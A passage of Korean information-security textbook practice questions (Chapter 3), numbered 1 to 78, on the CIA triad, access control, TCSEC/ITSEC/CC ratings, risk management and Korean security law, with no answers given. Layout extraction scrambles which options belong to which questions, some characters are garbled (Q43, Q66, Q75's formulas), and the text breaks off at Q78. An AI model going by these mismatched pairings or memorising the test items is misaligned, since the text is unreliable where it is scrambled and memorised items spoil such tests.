곳에 접속해 있는지 알고, 그곳 문화에 어울리게 행동하라. o 4원칙 : 다른 사람의 시간을 존중하라. o 5원칙 : 온라인상의 당신 자신을 근사하게 만들어라. o 6원칙 : 전문적인 지식을 공유하라. o 7원칙 : 논쟁은 절제된 감정 아래 행하라. o 8원칙 : 다른 사람의 사생활을 존중하라. o 9원칙 : 당신의 권력을 남용하지 말라. o 10원칙 : 다른 사람의 실수를 용서하라. 209
210 제 3장. 정보보호 개론 연습 문제 풀이 210
211 1. 다음은 정보보호관리 활동에 대한 설명이다. 올바르게 연결되지 않은 것은? 1 관리적 - 보안전담조직 구성 2 물리적 - 서버실 출입일지 작성 3 기술적 - 시스템 접근 제어 및 관련 로그관리 4 물리적 - 비상사태를 대비한 비상계획 수립 2. 인터넷상에서 위험, 피해 그리고 대책에 관한 관계에서 옳지 않은 것은? 1 무결성 - 데이터의 수정 - 데이터의 유실 - 암호 체크썸(메시지 다이제스트) 2 기밀성 - 도청 - 기밀 데이터의 유출 - 데이터의 암호화 3 서비스 거부 - 프로세서 및 메모리의 과부하 - 서비스공급 불능 - 암호기술(DES) 4 인증 - 합법적 사용자료 위장 - 사용자의 오인 - 인증 기술(PKI) 3. 정보시스템의 보안 취약성 중 상대적으로 가 장 위험도가 높은 취약성을 보이는 것은 무엇인가? 1 인적 취약성 2 물리적 취약성 3 하드웨어 취약성 4 소프트웨어 취약성 4. 정보시스템의 보안 문제를 유발시키는 대표적 인 보안 위협의 종류가 아닌 것은? 1 비인가 외부자에 의한 위협 2 비인가 내부자에 비의도적 위협 3 인가 내부자의 의도적 위협 4 시스템 신뢰에 따른 위협 5. 서비스 거부(Denial Of Service) 공격으로 손상 을 받을 수 있는 정보시스템의 특성은 다음 중 어느 것인가? 6. 다음은 일반적인 보안 요구사항에 관한 설명 이다. 보기에 해당하는 것은? 허가되지 않은 사람에 의한 정보의 변경, 삭 제, 생성 등으로부터 보호하는 조치. 1 기밀성 2 무결성 3 가용성 4 접근통제 7. PC 데이터의 기밀성을 가장 잘 유지할 수 있 는 방법은 무엇인가? 1 패스워드 2 파일 암호화 3 이동 가능한 디스켓 4 key operated power source 8. 정보를 전송하는 데 있어서 전송 주체가 되는 송신자와 수신자가 정당한지를 확인하기 위한 절 차를 무엇이라 하는가? 1 인증(Authentication) 2 인가(Authorization) 3 이중 서명(Dual Signature) 4 접근 통제(Access Control) 9. 권한 부여의 의미로써 사용자가 응용시스템에 대한 사용 권한을 부여받는 것을 무엇이라 하는 가? 1 인증(Authentication) 2 인가(Authorization) 3 이중 서명(Dual Signature) 4 부인 방지(Non-Redundancy) 10. 사용자가 통계적인 데이터 값으로부터 개별 적인 데이터 항목에 대한 정보를 추적하지 못하 도록 해야 한다는 것을 무엇이라 하는가? 1 가용성(Availability) 2 기밀성(Confidentiality) 3 무결성(Integrity) 4 신뢰성(Reliability) 1 사용자 인증 3 기밀성 2 추론 방지 4 무결성 211
212 11. 다음 중 보안 운영에서 적절치 않은 것은? 16. 데이터에 대한 위협 요소가 아닌 것은? 1 내부자에 대한 네트워크 자원의 공유 2 DMZ를 형성하여 외부 비인가자의 접근제어 3 VPN을 활용한 내부 비인가자에 대한 네트워크 분리 4 VLAN을 이용한 내부 비인가자에 대한 네트워크 분리 12. 외부에 서비스를 하지 않는 시스템을 운영하 는 일반 관리자가 행하여 할 사항 중 적절치 못 한 것은? 1 비인가된 외부자의 접근제어 설정을 위한 네트워크 공유 2 주기적인 로그 분석을 통한 침해 시도 방지 3 외부 접근에 대한 기본값은 모두 접근거부로 설정 4 보안 정책을 설정하여 주기적인 점검 13. 다음 중 정보보호의 무결성과 기밀성에 위협 요소가 되지 않은 것은 무엇인가? 1 위조 2 차단 3 변조 4 가로채기 1 삭제 2 복사 3 부인 4 변조 17. 다음은 일반적인 보안 요구사항에 관한 설명 이다. 설명에 해당하는 것은? 정보의 송신자가 송신사실을 부인하는 행위로 부터 수신자를 보호, 또는 수신자가 수신사실 을 부정하는 행위로부터 송신자를 보호하기 위해 수신 증거를 제공하는 보안서비스 1 기밀성 2 무결성 3 부인 방지 4 접근 통제 18. 다음은 정보보호 목표 중 무엇에 대한 설명 인가? 민감하거나 중요한 데이터가 허가되지 않는 사람에게 노출 및 열람되지 않아야 한다. 1 기밀성 2 무결성 3 가용성 4 접근 통제 19. 다음은 데이터를 보호하기 위한 여러 가지 방법이다. 가장 보호수준이 높고 적절한 방법은 무엇인가? 14. 허가받지 않은 사용자가 마치 허가받은 사용 자인 것처럼 정보를 전송하는 형태의 공 격을 무엇이라 하는가? 1 변조 2 스니핑 3 차단 4 위조 15. 다음은 일반적인 보안 요구사항에 관한 설명 이다. 설명에 해당되는 것은? 사용자 혹은 프로세스에 대한 확인, 사용자 ID와 패스워드를 통한 사용자를 식별하고 유 효한 사용자인지를 확인 1 ID, Password 2 파일 암호화 3 침입차단시스템 4 부팅 접근 제어 20. 다음 인증 방식 중에서 보안상 가장 강력한 방식은 무엇인가? 1 순환 패스워드(Recurring Password) 2 상호 인증(Challenge/Response) 3 개인 식별 번호(PIN, Personal Identification Number) 4 패스워드(Password) 1 기밀성 3 인증 2 무결성 4 접근 통제 212
213 21. 전산 자원의 보호를 위해 접근을 제어하는 방법 중에 자원별 접근 제어 목록(ACL, Access Control List)에 포함되지 않는 것은? 1 객체에 대한 주체의 접근 권한 2 일정 객체를 접근할 수 있는 주체 리스트 3 자원 가치에 대한 가치 리스트 4 자원(객체)의 식별자 22. 컴퓨터 데이터를 보호하기 위해 등급에 따라 분류를 하는 내용으로 틀린 것은? 1 일반적인 문서와 같이 민감성에 따라 여러 등급을 가진다. 2 일반적으로 고, 중, 저와 같이 단순화하여 표현하기도 한다. 3 컴퓨터 자원들을 과잉보호하는 위험이 있을 수 있다. 4 컴퓨터 자원들을 중요도에 따라 안전하게 관리할 수 있다. 23. 다음은 일반적인 보안 요구사항에 관한 설명 이다. 설명에 해당하는 것은 무엇인가? 허가된 사용자가 시스템의 자원을 요구했을 시 요구한 시스템 자원 및 서비스를 언제나 제공할 수 있어야 한다. 1 기밀성 2 무결성 3 가용성 4 접근 통제 26. 네트워크상에서 허가받지 않은 사용자가 전 송 중인 정보를 도청하거나 유출하는 형태의 공 격인 가로채기(Interception)는 다음 중 어느 위협 요소에 해당되는가? 1 가용성 2 무결성 3 완벽성 4 기밀성 27. 정보시스템 보안을 위해 고려해야 할 사항이 아닌 것은? 1 비용을 고려하여 백업은 같은 저장장소에 반복해서 저장한다. 2 시스템이 자연재해로 인해 피해를 보지 않도록 예방한다. 3 제한된 사람만이 시스템에 접근할 수 있도록 한다. 4 시스템 자체의 신뢰도를 체크한다. 28. 다음 설명에 해당되는 시스템은 무엇인가? 각종 네트워크 보안 제품의 통합 관리와 개별 침입에 대한 종합적인 대응을 위하여, 각 요 소제품 간에 인터페이스 및 교환되는 메시지 포맷을 표준화하여 모니터링과 원격지 중앙 관리까지 가능한 지능형 보안관리 시스템을 연구하는 기술이다. 기업의 보안 목적을 효율 적으로 실현시킬 수 있는 통합 보안관제시스 템 24. IDC(Internet Data Center)는 여러 가지 보안 상 위험에 노출되는 것을 방지하기 위하여 여러 가지 방안을 고려하여야 한다. 다른 정보시스템 과 비교하여, IDC 센터에서 우선적으로 고려해야 되는 사항은? 1 네트워크 보안 2 물리적 보안 3 시스템 보안 4 데이터 보안 25. 다음 네트워크 환경을 통한 일반적인 보안 침입 형태 중 메시지 무결성에 대한 공격 형태인 것은 무엇인가? 1 위조 2 변조 3 가로채기 4 차단 1 ESM 2 IDS 3 IDC 4 EIP 29. 다음 설명에 맞는 시스템은 무엇인가? 시스템 스스로가 환경에 맞게 설정 제어하는 시스템으로, 침입과 결함이 일부 발생한 상황 에서 데이터와 프로그램의 일관성을 유지하면 서 DoS 공격에 대항하는 기술 및 가용성을 갖춘 시스템 1 VPN(Virtual Private Network) 2 PKI(Public Key Infrastructure) 3 ITS(Intrusion Tolerant System) 4 CIDF(Common Intrusion Detection Framework) 213
214 30. 다음 중 정보시스템 접근 보안정책이 아닌 것은? 1 DAC 2 MAC 3 RBAC 4 PKI 35. TNI는 네트워크 시스템을 평가하기 위하여 기존의 TCSEC을 네트워크 시스템에 적용하여 해 석한 것으로 1987년에 개발되었다. TCSEC에서 규정하는 보안 수준 중 사용자 계정의 패스워드 의 암호화 지원 수준은? 31. 정보보호를 위해서는 기술적 능력 못지 않게 관리 대책도 중요하다. 다음의 관리대책 중 가장 적당하지 않은 것은? 1 보안전담조직의 구성 2 소속원에 대한 보안의식 교육 및 홍보 3 보안 솔루션 도입 4 정보보호정책, 지침, 절차의 개발 및 준수 32. 인터넷 환경에서의 정보 자산에 대한 공격 중 소극적인(Passive) 공격에 해당되는 것은 다음 중 무엇인가? 1 트래픽 분석(Traffic Analysis) 2 메시지의 변조 3 메시지의 파괴 4 IP 주소 도용 33. 영국, 독일, 프랑스 그리고 네덜란드 등의 유 럽국가에서 정보보호평가 기준의 상이함에서 오 는 시간과 인력 낭비를 줄이기 위해 제정한 컴퓨 터 시스템의 보안등급 기준은 무엇인가? 1 TCSEC(Orange Book) 2 ITSEC 3 BS POSIX TNI(Trusted Network Interpretation of TCSEC)는 네트워크 시스템을 평가하기 위하여 컴퓨터 시스템의 보안 수준을 설명한 것이다. 다 음 중 옳지 않은 것은? 1 B level 2 C1 level 3 C2 level 4 C3 level 36. 다음은 컴퓨터 시스템 보안을 위한 지침인 TCSEC(Orange Book)의 어떤 등급의 보안요구사 항을 나타낸 것이다. 어떤 등급을 나타내고 있는 가? - 보안정책.비인가된 접근으로부터의 객체보호.사용자별 접근 단위의 포함/제외.객체할당/재할만 전에 저장매체 정보에 대한 모든 허가 해제 - 식별 및 인증.개인별 책임추적.개인별 감사기능 활동 연관.감사기록 생성 및 보호.개인별 감사 - 보증(운영상 보증).보호된 자원 분리.생명주기 보증.취약성 분석 - 문서화(보안기능설명서).상세한 감사기록 구조 및 감사파일의 검토 유지 절차 1 D1(최소한의 보호) 2 C2(통제된 접근) 3 B2(구조화된 보호) 4 A1(검증된 보호) 1 B1 보안 정책 및 모든 데이터가 보안 등급을 가짐 2 B2 체계화된 보호시스템 3 C1 파일 퍼미션 단위의 접근 허가 4 D1 보안이 전혀 고려되지않은 상태의 시스템 214
215 37. 현재 국내의 정보보호 제품 및 서비스 시장 분석 자료에서 인터넷 보안 산업은 크게침입차단 시스템, 암호, 바이러스, 3A 등 4가지 시장으로 구분한다. 다음 중 3A에 대한 설명으로 틀린 것 은 무엇인가? 1 3A는 Authentication(인증), Authorization(인 가, 권한 부여), Availability(가용성)로 구성된다. 2 Authentication(인증)은 실제 해당 사용자가 맞는지 확인하는 것으로 패스워드, PKI 인증서 등이 관련된다. 3 Authorization(인가, 권한 부여)의 경우 사용자 가 자원의 사용이 허용된 사용자인지 확인하 는 것으로 SSO, EAM, PMI 등이 관련된다. 4 Administration(관리)은 보안솔루션 통합 관리 로, ESM과 관련이 되어 있다. 38. ESM(Enterprise Security Management)에 대 한 설명으로 옳지 않은 것은? 1 보안 솔루션 관리의 효율성을 높일 수 있다. 2 보안 솔루션을 각각의 인터페이스가 아닌, 하 나의 인터페이스로 관리할 수 있다. 3 어떠한 수정도 없이 모든 보안 제품에 대한 통합적인 관리가 가능하다. 4 서로 다른 보안 솔루션에서 발생하는 로그를 통합 관리할 수 있다. 39. 다음 중 정보보호의 궁극적인 목적을 가장 잘 설명한 것은 무엇인가? 1 정보보호의 목적은 해당 기관에서 보유하고 있는 정보의 기밀성, 무결성 그리고 가용성을 보장하는 것이다. 2 정보보호의 목적은 해당 기관의 정보시스템을 포함한 조직 전체의 안전성을 보장하기 위하여 물리적, 기술적 그리고 관리적 분야의 정보보호의 목적을 충족시키는 것이다. 3 정보보호의 목적은 정보보호의 목적 자체로서 의 의미보다 해당 기관의 업무 및 비즈니스의 목적을 달성하기 위해 사용되는 정보자산을 보호하는 것이 목적이다. 4 정보보호의 목적은 정보의 수집, 가공, 저장, 검색 그리고 송수신 중에 정보의 훼손, 변조 그리고 유출 등을 방지하는 것을 목적으로 한 다. 40. 다음이 설명하는 것은 무엇인가? 정보보호 활동에 대한 기본적인 방향과 근거 를 제시하고 조직 구성원의 정보보호에 대한 책임과 역할을 명확하게 규정해야 한다. 또한 최고경영자에 의해 승인되어야 하며, 모든 내 용은 간결하며 알기 쉽게 작성 및 배포되어 모든 구성원이 이를 숙지하여야 한다. 1 정보보호 내규 2 정보보호 규정 3 정보보호 행동강령 4 정보보호 정책 41. 정보보호 강화를 위한 보호대책은 예방 (Preventive), 탐지(Detective) 그리고 교정 (Corrective) 대책으로 분류할 수 있다. 다음 중 예방 통제의 내용과 거리가 먼 것은? 1 발생가능 한 잠재적인 문제들에 대하여 사전 에 취해지는 통제이다. 2 조직의 정보보호를 위하여 침입차단시스템과 침입탐지시스템을 설치한다. 3 침해사고가 발생하였을 경우 적절한 절차에 의하여 조치되고 보고될 수 있도록 정보보호 정책과 지침을 수립한다. 4 정보보호를 위한 보안 서약서를 모든 직원에 게 요청한다. 42. 정보보호에 대한 역할과 책임을 명확하게 구 분하고, 침해사고 발생 후에도 감사가가능하도록 하는 정보보호의 개념은 무엇인가? 1 정보보호 정책(Security Policy) 2 정보보호 역할과 책임(Roles & Responsibility) 3 책임추적성(Accountability) 4 기밀성(Integrity) 215
216 43. 안전성과 신뢰성이 입증된 컴퓨터 시스템을 미국 국방부 및 ㅊ 慣 璲 鰥?보급하기 위한 컴퓨터 시스템의 평가기준으로 일명 "Orange book"으로 불리며 1985년에 미 국방부 표준(DoD STD)으로 채택된 표준은 무엇인가? 1 TCSEC 2 ITSEC 3 CC 4 GMITS 44. 정보보호 시스템 및 제품을 일반 사용자가 신뢰하며 안전하게 사용할 수 있도록 제품의 신 뢰성과 안전성을 보증하기 위한 규정과 제도를 평가 및 인증 제도라고 한다. 이러한 평가와 인증에 대한 개념을 바르게 정의 한 것은 무엇인가? (A) 평가기준에 적합한지의 여부를 평가 기관 이 확인하는 것 (B) 평가기관이 수행한 정보보호시스템의 평 가 결과를 확인하는 것 1 (A)-평가, (B)-인증 2 (A)-평가, (B)-평가 3 (A)-인증, (B)-인증 4 (A)-인증, (B)-평가 45. 국내 정보보호 시장의 신뢰성과 안전성을 보 장하기 위하여 1998년 이후에 국내 정보보호 시 스템 평가가 도입되어 운영 중이다. 국내 정보보 호시스템의 보안등급은 K1 등급부터 K7 등급으 로 구분되어 평가되고 있다. 이러한 평가 등급 중 정부 및 공공기관에 설치를 권장하고 있는 보 안등급과 이와 동일한 CC(Common Criteria) 보 안등급은각각 무엇인가? 1 K2 - C1 2 K4 - B1 3 K2 - EAL2 4 K4 - EAL4 46. 국가별 정보보호제품의 평가 결과를 상호 인 정하며, 정보보호시스템에 공통으로 적용될 수 있는 공통평가 기준을 개발 적용하기 위한 목적 으로 개발된 국제공통평가기준(CC, Common Criteria)은 3단계의 평가 과정을 거친다. 다음 중 3단계의 평가 과정과 관련이 없는 것은 무엇인 가? 1 PP(Protection Profile) 2 ST(Security Target) 3 TOE(Target Of Evaluation) 4 CCRA(CC Recognition Arrangements) 47. 정보보호시스템에 대한 평가 기준 중 다음의 보안등급에서 설명하는 등급이 아닌 것 은 무엇 인가? 데이터에 대한 레이블링된 통제로서, 주체 (subjects)와 객체(objects)의 강제적 접근 통 제가 이루어져 낮은 등급을 지닌 사용자는 높 은 등급의 정보에 접근하지 못하도록 통제되 는 보안 등급 1 EAL4 2 B1 3 K4 4 E4 48. 다음은 ITSEC에 대한 설명이다. 적절하지 못 한 설명은 무엇인가? 1 ITSEC는 1991년 5월에 발표된 유럽 국가들의 정보시스템에 대한 공통평가기준이다. 2 미국의 표준인 TCSEC이 보안의 기술적 요소 중 기밀성을 강조한 것과 비교하여 ITSEC은 정보의 무결성과 가용성을 포함하는 포괄적인 표준안을 제시하였다. 3 평가등급은 E1(최저등급), E2, E3, E4, E5, E6, E7(최고 등급)의 총 7등급으로 평가된다. 4 ITSEC은 TCSEC과의 호환을 위하여 F-C1, F-C2, F-B1, F-B2, F-B3의 보조적인 등급을 가지고 있다. 49. 위험분석에서 사용되는 핵심 개념이 아닌 것 은? 1 규정 준수 3 위협 2 자산 4 취약성 216
217 50. 조직의 자산에 대한 위협과 취약성을 분석하 여 비용 효과적인 측면에서 적절한 보호대책을 수립하여 위험을 감수할 수 있는 수준으로 유지 하는 과정을 무엇이라 하는가? 1 취약성 분석 2 위험 관리 3 정책 관리 4 정책 수립 51. 자산에 대한 취약성과 위협을 분석하고 파악 하여 발생가능성과 그 영향에 따른위험의 내용과 정도를 결정하는 일련의 과정을 무엇이라 하는 가? 1 보안 관리 2 위험 분석 3 정책 관리 4 정보시스템 분석 52. 위험 관리에 대한 설명으로 잘못된 것은? 54. 다음 중 자동화된 위험분석 도구의 특징이 아닌 것은? 1 위험분석 시 소요되는 시간과 비용을 절감할 수 있다. 2 수작업보다 결과에 대한 신뢰도가 높다. 3 분석 시 정확한 자료의 입력이 매우 중요 하다. 4 수작업 시의 실수로 인한 오차를 줄일 수 있다. 55. 조직의 자산에 대한 안전성 및 신뢰성을 향 상시키기 위한 절차와 과정을 체계적으로 수립하 고 관리 및 운영하여 정보보호의 목표인 정보의 기밀성, 무결성 그리고 가용성을 실현하기 위한 일련의 활동과 기준 및 지침 등의 내용에 대한 규정이 포함되어 있는 것은 무엇인가? 1 보호 대상, 위협 요소 그리고 취약성 분석 등 을 포함한다. 2 위험 평가는 위험을 평가하여 적절한 보안 대책을 결정한다. 3 보안대책을 결정하는 위험 대책과 위협요소, 자산 그리고 취약성을 평가하는 위험 평가로 구성된다. 4 위험관리의 주된 활동은 위험 대책과 위험 평가로 구성된다. 53. 정보 시스템 보안은 정기적인 관리가 필요하 다. 다음 중 정보 시스템 보안관리 주기를 순서 대로 바르게 나열한 것은? o 보안 정책 및 지침의 정의 o 보안대책의 구현 o 인식 교육 o 감사 o 위험 및 비용 분석 1 정보보호 정책 및 지침 2 정보보호 규정 및 법률 3 정보보호 관리 체계 4 정보보호 이용촉진 및 정보보호법률 56. 정보보호의 수준향상을 위하여 정보통신부 장관은 2002년 정보통신부고시 제 호에 "정보통신망 이용촉진 및 정보보호 등에 관한 법 률 제47조에 의거하여 정보보호 관리체계 인증심 사 기준"을 고시하였다. 이 기준에서는 정보보호 관리 체계를 수립하기 위한 활동을 5단계 활동으 로 정의하였는데 다음 중 5단계 활동에 포함되지 않는 것은 무엇인가? 1 취약성 분석 및 평가 2 정보보호 정책의 수립 3 위험관리 4 사후관리 1 보안대책 구현-보안정책 및 지침의 정의- 인식교육-감사-위험 및 비용분석 2 보안정책 및 지침의 정의-인식교육-감사- 보안대책 구현-위험 및 비용분석 3 보안정책 및 지침의 정의-보안대책 구현- 인식교육-감사-위험 및 비용분석 4 보안정책 및 지침의 정의-보안대책 구현- 감사-인식교육-위험 및 비용분석 217
218 57. 위험 관리란 조직의 자산(Assets)을 보호하기 위하여 자산에 대한 위험을 분석하고비용 효과적 인 측면에서 적절한 보호 대책(Safeguards)을 수 립하여 위험을 감수할수 있는 수준으로 유지하는 일련의 과정으로 위험평가, 위험분석 그리고 위 험완화의단계를 거치는 총체적인 과정을 말한다. 위험관리에 사용되는 용어에 대한 설명으로틀린 것은 무엇인가? 1 자산(Assets)은 조직의 업무에 사용되는 가치 가 있는 것 중에서 서버, 통신장비, 어플리케 이션 그리고 Database 등 정보시스템과 정보 를 포함한 유형의 설비를 자산이라 한다. 2 위협(Threats)은 항상 일어날 수 있는 사건이 나 구성 등으로 조직의 자산에 피해를 줄 수 있는 가능성 있는 잠재적인 요소 모든 것을 말한다. 3 취약성(Vulnerabilities, 특히 기술적 취약성에 대한 정의)이란 운영체제, 어플리케이션 등에 프로그램 상의 오류, 설계상의 구조적 문제점 그리고 관리자의 실수로 인한 운영체제 또는 하드웨어 상에 보안상의 결함 58. 위험관리 과정에서 조직의 보안요구사항에 대한 효과적인 식별 및 효율적인 위험의감소를 실현하기 위하여 세부적인 위험분석 방법들이 존 재한다. 다음에서 설명하는위험분석 방법은 무엇 인가? 모든 시스템에 대하여 표준화된 보안대책을 제시하며 체크리스트 형태로 보안대책이 있는 지 없는지를 판단하여, 적용되어 있지 않은 보안대책을 적용하는 방법으로 수행하는 위험 분석 방법 59. 위험관리 과정에서 구현된 보안 대책의 적용 후에도 조직에 남아있을 수 있는 잔여위험 (Residual risk)에 대한 설명 중 적절하지 않은 것 은 무엇인가? 1 위험관리는 위험평가를 통하여 조직이 수용할 수 있는 수준을 유지하는 것이 목적이기 때문 에 잔여위험이 존재할 수 있다. 2 적절한 위험평가를 통한 보호대책의 적용 후 에도 남아 있는 위험이 있을 수 있다. 3 잔여 위험에 대한 처리는 위험 회피, 이전, 감소 그리고 수용 등으로 처리된다. 4 위험평가 및 보호대책의 적용 후에도 잔여 위험이 존재할 경우 잔여위험을 완전히 제거 하기 위하여 상세위험분석을 수행한다. 60. 정보화촉진기본법 제15조 및 동법시행령 제 16조의 규정에 의하여 정보통신망 침입차단시스 템에 대한 평가기준[정보통신부고시 제 호 (' )]을 고시하였다. 다음 설명 중 고시 내용 과 다른 것은? 1 평가등급은 K1, K2, K3, K4, K5, K6, K7의 7단계로 되어있고 K7은 최저의 평가등급이다. 2 기밀성에 대한 평가는 모든 등급에서 선택적 으로 이루어질 수 있고 이 경우 각 평가 등급 에 E자를 붙인다. 3 보안기능 요구사항은 신분확인, 접근 통제, 무결성, 기밀성, 감사기록 및 추적 그리고 보안 관리로 이루어진다. 4 신뢰성을 확인하기 위한 사항은 개발과정, 시험과정, 형상관리, 운영환경 그리고 설명서 취약성으로 이루어진다. 1 베이스라인 접근법(baseline approach) 2 비정형접근법(informal approach) 3 혼합접근법(혼합접근) 4 상세위험분석(detailed analysis) 218
219 61. 정보보호관리체계 인증심사기준에서는 각 단 계별 주요 인증심사 요소를 아래와 같이 정보보 호정책 수립, 정보보호관리체계 범위설정, 위험관 리, 사후관리, 그리고 구현으로 구성되었다. 설명 으로 옳지 못한 것은? 63. 정보통신망이용촉진및정보보호등에관한법률 제 48조에 따르면 정보통신망 침해행위 를 할 경 우 최고 5년 이하의 징역 또는 5천만원 이하의 벌금에 처한다. 다음 중 정보 통신망 침해행위에 해당하지 않는 것은? 1 정보보호정책 수립: 신청기관에 적합한 정보 보호정책의 수립, 조직의 구성운영, 책임성의 명확한 설정 여부를 보며 크게 정책 수립과 조직 및 책임의 설정으로 나눌 수 있다. 2 정보보호 관리 체계 범위설정: 정보보호 관리 체계 수립운영을 위한 관리범위 설정 및 정보 자산의 현황조사 여부를 보며 크게 범위 설정 과 정보자산의 식별로 나눌 수 있다. 3 위험관리: 위험관리 전략 및 계획수립, 위험 분석평가, 정보보호대책 선택의 적절성 여부를 보며 크게 위험관리 전략 및 계획 수립, 위험분석, 위험평가, 정보보호대책 선택 그리고 정보보호계획 수립으로 나눌 수 있 4 사후관리: 정보보호 관리 체계의 재검토, 정보 보호 관리체계의 모니터링 및 개선, 내부감사 5 구현: 정보자산의 안전한 보호를 위한 시설의 구현 방법과 시설 보호 방법 여부를 본다. 62. 정보통신기반보호법 제7조 제1항에서는 국가 기관과 지방자치단체가 관리하는 주요정 보통신 기반시설은 해당기관의 장이 요청하거나, 위원회 위원장(국무총리)이 보완을 명하는 경우 보호대책 의 수립 및 침해사고 예방 및 복구 지원을 대통 령이 정하는 국가기관의 장 또는 대통령이 정하 는 전문기관의 장에게 요청할 수 있도록 정하였 다. 다음 중 대통령이 정하는 국가기관 및 대통 령이 정하는 전문기관이 아닌 것은? 1 한국정보보호진흥원 2 법 규정에 의하여 지정된 정보보호 전문 업체 3 국가 정보원 또는 국가보안기술연구소 4 국군기무사령부(국방 분야) 5 감사원 1 접근권한 없이 정보통신망에 침입하는 행위 2 악성 프로그램을 전달 또는 유포하는 행위 3 대량의 신호 또는 데이터를 전송하는 행위 4 개인정보 수집 시 이용자의 동의를 받지 않는 행위 64. 정보통신망이용촉진및정보보호에관한법률에 따르면 서비스 제공자가 형사 처분을 받는 경우 가 명시되어 있다. 다음 중 이에 해당하지 않는 것은? 1 수집자 의사에 반한 광고성 전송 2 개인정보의 불법 제3자 제공 3 직무상 알게 된 비밀을 누설 4 개인정보의 목적 외 이용 훼손 침해 65. 전자서명을 안전하고 신뢰성 있게 이용할 수 있는 환경을 조성하고 인증업무를 수행하도록, 전자서명법 제4조의 규정에 의하여 공인인증기관 이 지정되었다. 다음 중 지정된 공인인증 기관이 아닌 것은? 1 한국증권전산 2 금융결제원 3 한국은행 4 한국무역정보통신 66. 정보보호와 관련하여 다른 법률과의 관계에 서 특별법의 지위를 가지는 법률은 무엇인가? 1 정보통신기반보호법 2 정보 戮 타좇 結 允 個 篇 陸 ㅊ맏맬? 徨 箕 熏?br> 3 정보화촉진기본법 4 전자서명법 219
220 67. 다음은 정보통신망이용촉진및정보보호에관한 법률에서 규정한 처벌 규정이다. 다음에서 설명 하는 처벌규정을 맞게 나타낸 것은? 누구든지 정당한 접근권한 없이 또는 허용된 접근권한을 초과하여 정보통신망에 침입하여 서는 아니 된다(제48조 제1항). 또한 제48조 제1항의 규정을 위반하여 정보통신망에 침입 하는 자는 (xx)년 이하의 징역 또는 (yy)원 이 하의 벌금에 처한다(제63 조). 1 3년 이하의 징역 또는 3천만원 이하의 벌금 2 5년 이하의 징역 또는 5천만원 이하의 벌금 3 3년(10년) 이하의 징역 또는 3천만원 이하의 벌금 4 5년(7년) 이하의 징역 또는 5천만원 이하의 벌금 68. 다음 중 "정보통신망 이용촉진 및 정보보호 등에 관한 법률"에서 규정하고 있는 개인정보의 정의에 대하여 가장 적절하게 설명한 것은 무엇 인가? 1 개인임을 알아볼 수 있는 성명과 주민등록 번호로 구성된 정보를 개인정보라 한다. 2 개인임을 알아볼 수 있는 성명과 주민등록 번호, 그리고 개인의 사생활을 직접적으로 침해할 수 있는 개인 신상과 직접적으로 관련 이 있는 전화번호, 주소 등이 포함된 정보를 개인정보라 한다. 3 개인임을 알아볼 수 있는 성명과 주민등록 번호를 포함하여 개인의 신용과 금전적 영향 을 미칠 수 있는 계좌번호 등이 포함된 정보 를 개인정보라 한다. 4 개인에 관한 정보로서 성명, 주민등록번호 등에 의하여 당해 개인임을 알아볼 수 있는 부호, 문자, 음성, 음향 및 영상 등의 정보를 개인정보라 한다. 69. 다음은 전자서명법 제1장 총칙 제2조 정의에 서 규정하고 있는 용어의 정의에 대한 설명으로 옳지 않은 것은 무엇인가? 1 "전자문서"라 함은 정보처리시스템에 의하여 전자적 형태로 작성되어 송신 또는 수신 되거나 저장된 정보를 말한다. 2 "전자서명"이라 함은 서명자를 확인하고 서명자가 당해 전자문서에 서명하였음을 나타 내는데 이용하기 위하여 당해 전자문서에 첨부되거나 논리적으로 결합된 전자적 형태의 정보를 말한다. 3 "인증"이라 함은 전자서명생성정보가 가입자 에게 유일하게 속한다는 사실을 확인하고 이 를 증명하는 행위를 말한다. 4 "전자서명정보"라 함은 전자서명생성정보가 가입자에게 유일하게 속한다는 사실을 확인 하고 이를 증명하는 전자적 정보를 말한다. 70. 정보시스템 보안기능의 신뢰도 측정을 위한 평가기준을 제공하여 이용자의 인지도및 선택상 의 편익향상을 위하며, 정보시스템의 안전 운영 에 필요한 보안요구 수준에상응하고 신뢰성 있는 정보보호시스템 보급 확대를 위하여 국내에서 수 행하고 있는정보시스템 평가제도에서 인증기관과 평가기관이 바르게 연결된 것은 무엇인가? 1 국가정보원-한국정보보호진흥원 2 국가정보원-국가보안기술연구소 3 한국정보보호진흥원-감사원 4 한국정보보호진흥원-국가보안기술연구소 71. 조직이 보호하여야할 자산을 파악하고 그 가 치를 평가하며 자산에 대한 위협의 종류 영향을 평가하며, 조직이 지니는 취약점을 분석하므로써 위협이 주는 위험의 정도를 평가하는 과정을 무 엇이라 하는가? 1 취약성 분석 2 위험 관리 3 위험 평가 4 정책 수립 220
221 72. 다음과 같은 위험분석과 위험관리 수행과정 중 가장 먼저 실시되어야 하는 것은 엇인가? 76. 위험분석의 요소 중 하나인 취약점에 관한 시스템의 환경적 특성이 아닌 것은? 1 취약성 분석 2 위협 분석 3 위험 평가 4 자산 파악 및 평가 73. 위험분석은 자산에 대한 취약성과 위협을 분 석하고 파악하여 발생가능성과 그 영향에 따라 위험의 내용과 정도를 결정하는 일련의 과정으로 볼 수 있다. 이 때 일반적인 위험의 정의로 알맞 는 것은? 1 위험 = 위협이 성공할 가능성 * 위협 성공 시의 손실 크기 2 위험 = 위협이 성공할 가능성 + 위협 성공 시의 손실 크기 3 위험 = 위협이 나타날 가능성 * 위협 성공 시의 손실 크기 4 위험 = 위협이 나타날 가능성 + 위협 성공 시의 손실 크기 74. 위험평가와 위험관리를 수행함으로써 얻는 효과가 아닌 것은? 1 조직의 자신에 대한 잠재적손실을 파악하고 측정하기 위한 체계적인 방법수립 2 조직의 취약점을 완전히 없앨수 있다 3 대응방안 설계를 위한 합리적 기준 제시 4 정보보호에 대한 전체적인 시각을 갖게함 75. 위험관리에서 최적의 보호 대책을 선정하기 위해 BPL 공식을 사용한다. 다음 아래 공식 중 어는 경우에 보호대책을 반드시 구현해야 하는 가? (B: 보호책을 간구하는 데필요한 비용, P: 손 실이 일어날 확률, L: 특정사건에 의한 총제적 손 실) 1 B>PL 2 BPL 3 B 4 B= PL 1 복잡한 시스템이 단순한 시스템보다 더 많은 취약점이 존재 한다. 2 시스템의 취약 정도는 현재의 보안 상태에 영향을 받지 않는다. 3 모든 자산은 취약점을 가지고 있다 4 위협이 시스템의 취약점을 파고들어 조직의 손실을 가져온다 77. 다음중 경제적인 범위에서 위험을 최소화하 는 보안 대책을 작성하는데 필요한 정보를 제공 하는 것을 목적으로 하는 것은? 1 위험관리 2 자산관리 3 정보관리 4 위험분석 78. 다음 중 